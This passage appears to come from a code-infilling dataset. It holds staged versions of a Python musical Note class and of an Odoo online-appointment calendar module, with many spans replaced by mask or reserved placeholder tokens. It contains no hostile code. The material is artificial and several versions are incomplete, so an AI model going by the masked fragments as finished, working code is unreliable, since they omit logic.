midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n <mask token>\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = 
[]\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi 
>= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\n<mask token>\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\n<mask token>\n",
"step-4": "from random import shuffle, choice\nfrom typing import Dict, List, Tuple\nnote_to_midi: Dict[int, int] = {(1): 0, (2): 2, (3): 4, (4): 5, (5): 7, (6):\n 9, (7): 11}\nmidi_to_note: Dict[int, int] = {(0): 1, (2): 2, (4): 3, (5): 4, (7): 5, (9):\n 6, (11): 7}\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n 
shuffle(ret)\n return ret\n\n def __sub__(self, other) ->int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) ->List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) ->int:\n return note_to_midi[self.num] + root\n\n\nINVERSE_POSSIBLE_NOTE = {Note(2), Note(3), Note(4)}\n\n\ndef choose_from_inverse_possible_note():\n return choice(list(INVERSE_POSSIBLE_NOTE))\n\n\nALL_NOTES = {Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7)}\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\ndef fill_in_thirds() ->Tuple[Note, Note]:\n first = choice(list(ALL_NOTES))\n second = choice(list(first.get_thirds()))\n return first, second\n",
"step-5": "from random import shuffle, choice\nfrom typing import Dict, List, Tuple\n\nnote_to_midi: Dict[int, int] = {\n 1: 0,\n 2: 2,\n 3: 4,\n 4: 5,\n 5: 7,\n 6: 9,\n 7: 11,\n}\n\nmidi_to_note: Dict[int, int] = {\n 0: 1,\n 2: 2,\n 4: 3,\n 5: 4,\n 7: 5,\n 9: 6,\n 11: 7,\n}\n\n\nclass Note:\n num: int\n\n @classmethod\n def choice(cls, *args: int):\n return Note(choice(args))\n\n @classmethod\n def from_midi(cls, midi: int, root: int):\n note = midi_to_note.get(midi % root)\n if isinstance(note, int):\n return cls(note)\n raise ValueError()\n\n def __init__(self, num: int):\n while num > 7:\n num -= 7\n while num <= 0:\n num += 7\n self.num = num\n\n def __int__(self):\n return self.num\n\n def __repr__(self):\n return str(self.num)\n\n def __str__(self):\n return f'Note: {self.num}'\n\n def __hash__(self):\n return hash(self.num)\n\n def _distance(self, other):\n if isinstance(other, Note):\n return self.num - other.num\n raise TypeError()\n\n def __eq__(self, other):\n return self._distance(other) == 0\n\n def __lt__(self, other):\n return self._distance(other) < 0\n\n def __le__(self, other):\n return self._distance(other) <= 0\n\n def __gt__(self, other):\n return self._distance(other) > 0\n\n def __ge__(self, other):\n return self._distance(other) >= 0\n\n def _get_interval(self, interval: int):\n return {Note(self.num - interval), Note(self.num + interval)}\n\n def get_unison(self):\n return self._get_interval(0)\n\n def get_second(self):\n return self._get_interval(1)\n\n def get_thirds(self):\n return self._get_interval(2)\n\n def get_forth(self):\n return self._get_interval(3)\n\n def get_fifth(self):\n return self._get_interval(4)\n\n def get_sixth(self):\n return self._get_interval(5)\n\n def get_seventh(self):\n return self._get_interval(6)\n\n def inv(self):\n return Note(6 - self.num)\n\n def get_next_possible_notes(self, /, leap=True):\n ret = [Note(self.num - 1), Note(self.num + 1)]\n if leap:\n ret += [Note(self.num - 2), Note(self.num + 2)]\n 
shuffle(ret)\n return ret\n\n def __sub__(self, other) -> int:\n dist = abs(self._distance(other))\n if dist > 3:\n dist = 7 - dist\n return dist\n\n def get_all_possible_midi(self, root: int) -> List[int]:\n midi = self.convert_to_midi(root)\n assert midi >= 0\n ret: List[int] = []\n while midi - 12 >= 0:\n midi -= 12\n while midi <= 127:\n ret.append(midi)\n midi += 12\n return ret\n\n def convert_to_midi(self, root: int) -> int:\n return note_to_midi[self.num] + root\n\n\nINVERSE_POSSIBLE_NOTE = {\n Note(2), Note(3), Note(4),\n}\n\n\ndef choose_from_inverse_possible_note():\n return choice(list(INVERSE_POSSIBLE_NOTE))\n\n\nALL_NOTES = {\n Note(1), Note(2), Note(3), Note(4), Note(5), Note(6), Note(7),\n}\n\n\ndef choose_from_all_notes():\n return choice(list(ALL_NOTES))\n\n\ndef fill_in_thirds() -> Tuple[Note, Note]:\n first = choice(list(ALL_NOTES))\n second = choice(list(first.get_thirds()))\n return first, second\n",
"step-ids": [
24,
26,
28,
33,
34
]
}
|
[
24,
26,
28,
33,
34
] |
<|reserved_special_token_0|>
class CalendarAppointmentSlot(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalendarAppointmentType(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CalendarAppointmentType(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _compute_website_url(self):
super(CalendarAppointmentType, self)._compute_website_url()
for appointment_type in self:
if appointment_type.id:
appointment_type.website_url = '/calendar/%s/appointment' % (
slug(appointment_type),)
<|reserved_special_token_0|>
def action_calendar_meetings(self):
self.ensure_one()
action = self.env['ir.actions.actions']._for_xml_id(
'calendar.action_calendar_event')
action['context'] = {'default_appointment_type_id': self.id,
'search_default_appointment_type_id': self.id}
return action
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def _get_appointment_slots(self, timezone, employee=None):
""" Fetch available slots to book an appointment
:param timezone: timezone string e.g.: 'Europe/Brussels' or 'Etc/GMT+1'
:param employee: if set will only check available slots for this employee
:returns: list of dicts (1 per month) containing available slots per day per week.
complex structure used to simplify rendering of template
"""
self.ensure_one()
appt_tz = pytz.timezone(self.appointment_tz)
requested_tz = pytz.timezone(timezone)
first_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
hours=self.min_schedule_hours))
last_day = requested_tz.fromutc(datetime.utcnow() + relativedelta(
days=self.max_schedule_days))
slots = self._slots_generate(first_day.astimezone(appt_tz),
last_day.astimezone(appt_tz), timezone)
if not employee or employee in self.employee_ids:
self._slots_available(slots, first_day.astimezone(pytz.UTC),
last_day.astimezone(pytz.UTC), employee)
today = requested_tz.fromutc(datetime.utcnow())
start = today
month_dates_calendar = cal.Calendar(0).monthdatescalendar
months = []
while (start.year, start.month) <= (last_day.year, last_day.month):
dates = month_dates_calendar(start.year, start.month)
for week_index, week in enumerate(dates):
for day_index, day in enumerate(week):
mute_cls = weekend_cls = today_cls = None
today_slots = []
if day.weekday() in (cal.SUNDAY, cal.SATURDAY):
weekend_cls = 'o_weekend'
if day == today.date() and day.month == today.month:
today_cls = 'o_today'
if day.month != start.month:
mute_cls = 'text-muted o_mute_day'
else:
while slots and slots[0][timezone][0].date() <= day:
if slots[0][timezone][0].date(
) == day and 'employee_id' in slots[0]:
today_slots.append({'employee_id': slots[0]
['employee_id'].id, 'datetime': slots[0
][timezone][0].strftime(
'%Y-%m-%d %H:%M:%S'), 'hours': slots[0]
[timezone][0].strftime('%H:%M')})
slots.pop(0)
dates[week_index][day_index] = {'day': day, 'slots':
today_slots, 'mute_cls': mute_cls, 'weekend_cls':
weekend_cls, 'today_cls': today_cls}
months.append({'month': format_datetime(start, 'MMMM Y', locale
=get_lang(self.env).code), 'weeks': dates})
start = start + relativedelta(months=1)
return months
class CalendarAppointmentSlot(models.Model):
_name = 'calendar.appointment.slot'
_description = 'Online Appointment : Time Slot'
_rec_name = 'weekday'
_order = 'weekday, hour'
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
weekday = fields.Selection([('1', 'Monday'), ('2', 'Tuesday'), ('3',
'Wednesday'), ('4', 'Thursday'), ('5', 'Friday'), ('6', 'Saturday'),
('7', 'Sunday')], string='Week Day', required=True)
hour = fields.Float('Starting Hour', required=True, default=8.0)
@api.constrains('hour')
def check_hour(self):
if any(slot.hour < 0.0 or slot.hour >= 24.0 for slot in self):
raise ValidationError(_(
'Please enter a valid hour between 0:00 and 24:00 for your slots.'
))
def name_get(self):
weekdays = dict(self._fields['weekday'].selection)
return self.mapped(lambda slot: (slot.id, '%s, %02d:%02d' % (
weekdays.get(slot.weekday), int(slot.hour), int(round(slot.hour %
1 * 60)))))
class CalendarAppointmentQuestion(models.Model):
_name = 'calendar.appointment.question'
_description = 'Online Appointment : Questions'
_order = 'sequence'
sequence = fields.Integer('Sequence')
appointment_type_id = fields.Many2one('calendar.appointment.type',
'Appointment Type', ondelete='cascade')
name = fields.Char('Question', translate=True, required=True)
placeholder = fields.Char('Placeholder', translate=True)
question_required = fields.Boolean('Required Answer')
question_type = fields.Selection([('char', 'Single line text'), ('text',
'Multi-line text'), ('select', 'Dropdown (one answer)'), ('radio',
'Radio (one answer)'), ('checkbox', 'Checkboxes (multiple answers)'
)], 'Question Type', default='char')
answer_ids = fields.Many2many('calendar.appointment.answer',
'calendar_appointment_question_answer_rel', 'question_id',
'answer_id', string='Available Answers')
class CalendarAppointmentAnswer(models.Model):
_name = 'calendar.appointment.answer'
_description = 'Online Appointment : Answers'
question_id = fields.Many2many('calendar.appointment.question',
'calendar_appointment_question_answer_rel', 'answer_id',
'question_id', string='Questions')
name = fields.Char('Answer', translate=True, required=True)
<|reserved_special_token_1|>
import calendar as cal
import random
import pytz
from datetime import datetime, timedelta, time
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from babel.dates import format_datetime
from odoo import api, fields, models, _
from odoo.tools.misc import get_lang
from odoo.addons.base.models.res_partner import _tz_get
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import ValidationError
class CalendarAppointmentType(models.Model):
_name = 'calendar.appointment.type'
_description = 'Online Appointment Type'
_inherit = ['mail.thread', 'website.seo.metadata',
'website.published.mixin']
_order = 'sequence'
sequence = fields.Integer('Sequence')
name = fields.Char('Appointment Type', required=True, translate=True)
min_schedule_hours = fields.Float('Schedule before (hours)', required=
True, default=1.0)
max_schedule_days = fields.Integer('Schedule not after (days)',
required=True, default=15)
min_cancellation_hours = fields.Float('Cancel Before (hours)', required
=True, default=1.0)
appointment_duration = fields.Float('Appointment Duration', required=
True, default=1.0)
reminder_ids = fields.Many2many('calendar.alarm', string='Reminders')
location = fields.Char('Location', help='Location of the appointments')
message_confirmation = fields.Html('Confirmation Message', translate=True)
message_intro = fields.Html('Introduction Message', translate=True)
country_ids = fields.Many2many('res.country',
'website_calendar_type_country_rel', string='Restrict Countries',
help=
'Keep empty to allow visitors from any country, otherwise you only allow visitors from selected countries'
)
question_ids = fields.One2many('calendar.appointment.question',
'appointment_type_id', string='Questions', copy=True)
slot_ids = fields.One2many('calendar.appointment.slot',
'appointment_type_id', 'Availabilities', copy=True)
appointment_tz = fields.Selection(_tz_get, string='Timezone', required=
True, default=lambda self: self.env.user.tz, help=
'Timezone where appointment take place')
employee_ids = fields.Many2many('hr.employee',
'website_calendar_type_employee_rel', domain=[('user_id', '!=',
False)], string='Employees')
assignation_method = fields.Selection([('random', 'Random'), ('chosen',
'Chosen by the Customer')], string='Assignment Method', default=
'random', help=
'How employees will be assigned to meetings customers book on your website.'
)
appointment_count = fields.Integer('# Appointments', compute=
'_compute_appointment_count')
    def _compute_appointment_count(self):
        # Count calendar.event records per appointment type with a single
        # grouped read instead of one search_count per record.
        meeting_data = self.env['calendar.event'].read_group([(
            'appointment_type_id', 'in', self.ids)], ['appointment_type_id'
            ], ['appointment_type_id'])
        # Map appointment type id -> number of linked meetings.
        mapped_data = {m['appointment_type_id'][0]: m[
            'appointment_type_id_count'] for m in meeting_data}
        for appointment_type in self:
            # Types with no meetings are absent from the grouping: default 0.
            appointment_type.appointment_count = mapped_data.get(
                appointment_type.id, 0)
    def _compute_website_url(self):
        # Override of website.published.mixin (see _inherit): point the
        # public URL at the online appointment page of each record.
        super(CalendarAppointmentType, self)._compute_website_url()
        for appointment_type in self:
            # New (unsaved) records have no id and cannot be slugged yet.
            if appointment_type.id:
                appointment_type.website_url = '/calendar/%s/appointment' % (
                    slug(appointment_type),)
    @api.returns('self', lambda value: value.id)
    def copy(self, default=None):
        """Duplicate the appointment type, suffixing the name with ' (copy)'."""
        # Any caller-supplied 'name' default is overridden on purpose so
        # the duplicate is distinguishable from the original.
        default = default or {}
        default['name'] = self.name + _(' (copy)')
        return super(CalendarAppointmentType, self).copy(default=default)
    def action_calendar_meetings(self):
        """Open the standard calendar.event action filtered on this type.

        :return: action dict for ``calendar.action_calendar_event`` with
            this appointment type preset as default value and as active
            search filter.
        """
        self.ensure_one()
        action = self.env['ir.actions.actions']._for_xml_id(
            'calendar.action_calendar_event')
        action['context'] = {'default_appointment_type_id': self.id,
            'search_default_appointment_type_id': self.id}
        return action
    def _slots_generate(self, first_day, last_day, timezone):
        """ Generate all appointment slots between first_day and last_day.

            Each slot is expressed three ways: in the appointment type's
            timezone, in the visitor's *timezone*, and as naive UTC.

            :param first_day: start datetime in the appointment timezone
            :param last_day: end datetime in the appointment timezone
            :param timezone: visitor timezone name, used as a dict key
            :return: [ {'slot': slot_record, <timezone>: (date_start, date_end), ...},
                      ... ]
        """
        def append_slot(day, slot):
            # Build the localized start/end for one recurring slot on one
            # day; end = start + appointment_duration (float hours).
            local_start = appt_tz.localize(datetime.combine(day, time(hour=
                int(slot.hour), minute=int(round(slot.hour % 1 * 60)))))
            local_end = appt_tz.localize(datetime.combine(day, time(hour=
                int(slot.hour), minute=int(round(slot.hour % 1 * 60)))) +
                relativedelta(hours=self.appointment_duration))
            # 'UTC' entries are naive datetimes (tzinfo stripped).
            slots.append({self.appointment_tz: (local_start, local_end),
                timezone: (local_start.astimezone(requested_tz), local_end.
                astimezone(requested_tz)), 'UTC': (local_start.astimezone(
                pytz.UTC).replace(tzinfo=None), local_end.astimezone(pytz.
                UTC).replace(tzinfo=None)), 'slot': slot})
        appt_tz = pytz.timezone(self.appointment_tz)
        requested_tz = pytz.timezone(timezone)
        slots = []
        # First day is special: only keep slots strictly later than the
        # current time-of-day. slot.weekday is '1'..'7' (Monday=1), which
        # matches datetime.isoweekday().
        for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==
            first_day.isoweekday()):
            if slot.hour > first_day.hour + first_day.minute / 60.0:
                append_slot(first_day.date(), slot)
        # rrule weekdays are 0-based (Monday=0), hence the - 1 shift.
        slot_weekday = [(int(weekday) - 1) for weekday in self.slot_ids.
            mapped('weekday')]
        # Remaining days: every slot whose weekday matches.
        for day in rrule.rrule(rrule.DAILY, dtstart=first_day.date() +
            timedelta(days=1), until=last_day.date(), byweekday=slot_weekday):
            for slot in self.slot_ids.filtered(lambda x: int(x.weekday) ==
                day.isoweekday()):
                append_slot(day, slot)
        return slots
def _slots_available(self, slots, first_day, last_day, employee=None):
""" Fills the slot stucture with an available employee
:param slots: slots structure generated by _slots_generate
:param first_day: start datetime in UTC
:param last_day: end datetime in UTC
:param employee: if set, only consider this employee
if not set, consider all employees assigned to this appointment type
"""
def is_work_available(start_dt, end_dt, intervals):
""" check if the slot is contained in the employee's work hours (defined by intervals)
"""
def find_start_index():
""" find the highest index of intervals for which the start_date (element [0]) is before (or at) start_dt
"""
def recursive_find_index(lower_bound, upper_bound):
if upper_bound - lower_bound <= 1:
if intervals[upper_bound][0] <= start_dt:
return upper_bound
return lower_bound
index = (upper_bound + lower_bound) // 2
if intervals[index][0] <= start_dt:
return recursive_find_index(index, upper_bound)
else:
return recursive_find_index(lower_bound, index)
if start_dt <= intervals[0][0] - tolerance:
return -1
if end_dt >= intervals[-1][1] + tolerance:
return -1
return recursive_find_index(0, len(intervals) - 1)
if not intervals:
return False
tolerance = timedelta(minutes=1)
start_index = find_start_index()
if start_index != -1:
for index in range(start_index, len(intervals)):
if intervals[index][1] >= end_dt - tolerance:
return True
if len(intervals) == index + 1 or intervals[index + 1][0
] - intervals[index][1] > tolerance:
return False
return False
def is_calendar_available(slot, events, employee):
""" Returns True if the given slot doesn't collide with given events for the employee
"""
start_dt = slot['UTC'][0]
end_dt = slot['UTC'][1]
event_in_scope = lambda ev: fields.Date.to_date(ev.start
) <= fields.Date.to_date(end_dt) and fields.Date.to_date(ev
.stop) >= fields.Date.to_date(start_dt)
for ev in events.filtered(event_in_scope):
if ev.allday:
event_tz = pytz.timezone(ev.event_tz or employee.
user_id.tz or self.env.user.tz or slot['slot'].
appointment_type_id.appointment_tz or 'UTC')
ev_start_dt = datetime.combine(fields.Date.from_string(
ev.start_date), time.min)
ev_stop_dt = datetime.combine(fields.Date.from_string(
ev.stop_date), time.max)
ev_start_dt = event_tz.localize(ev_start_dt).astimezone(
pytz.UTC).replace(tzinfo=None)
ev_stop_dt = event_tz.localize(ev_stop_dt).astimezone(pytz
.UTC).replace(tzinfo=None)
if ev_start_dt < end_dt and ev_stop_dt > start_dt:
return False
elif fields.Datetime.to_datetime(ev.start
) < end_dt and fields.Datetime.to_datetime(ev.stop
) > start_dt:
return False
return True
workhours = {}
meetings = {}
available_employees = [emp.with_context(tz=emp.user_id.tz) for emp in
employee or self.employee_ids]
random.shuffle(available_employees)
for slot in slots:
for emp_pos, emp in enumerate(available_employees):
if emp_pos not in workhours:
workhours[emp_pos] = [(interval[0].astimezone(pytz.UTC)
.replace(tzinfo=None), interval[1].astimezone(pytz.
UTC).replace(tzinfo=None)) for interval in emp.
resource_calendar_id._work_intervals_batch(
first_day, last_day, resources=emp.resource_id)[emp
.resource_id.id]]
if is_work_available(slot['UTC'][0], slot['UTC'][1],
workhours[emp_pos]):
if emp_pos not in meetings:
meetings[emp_pos] = self.env['calendar.event'].search([
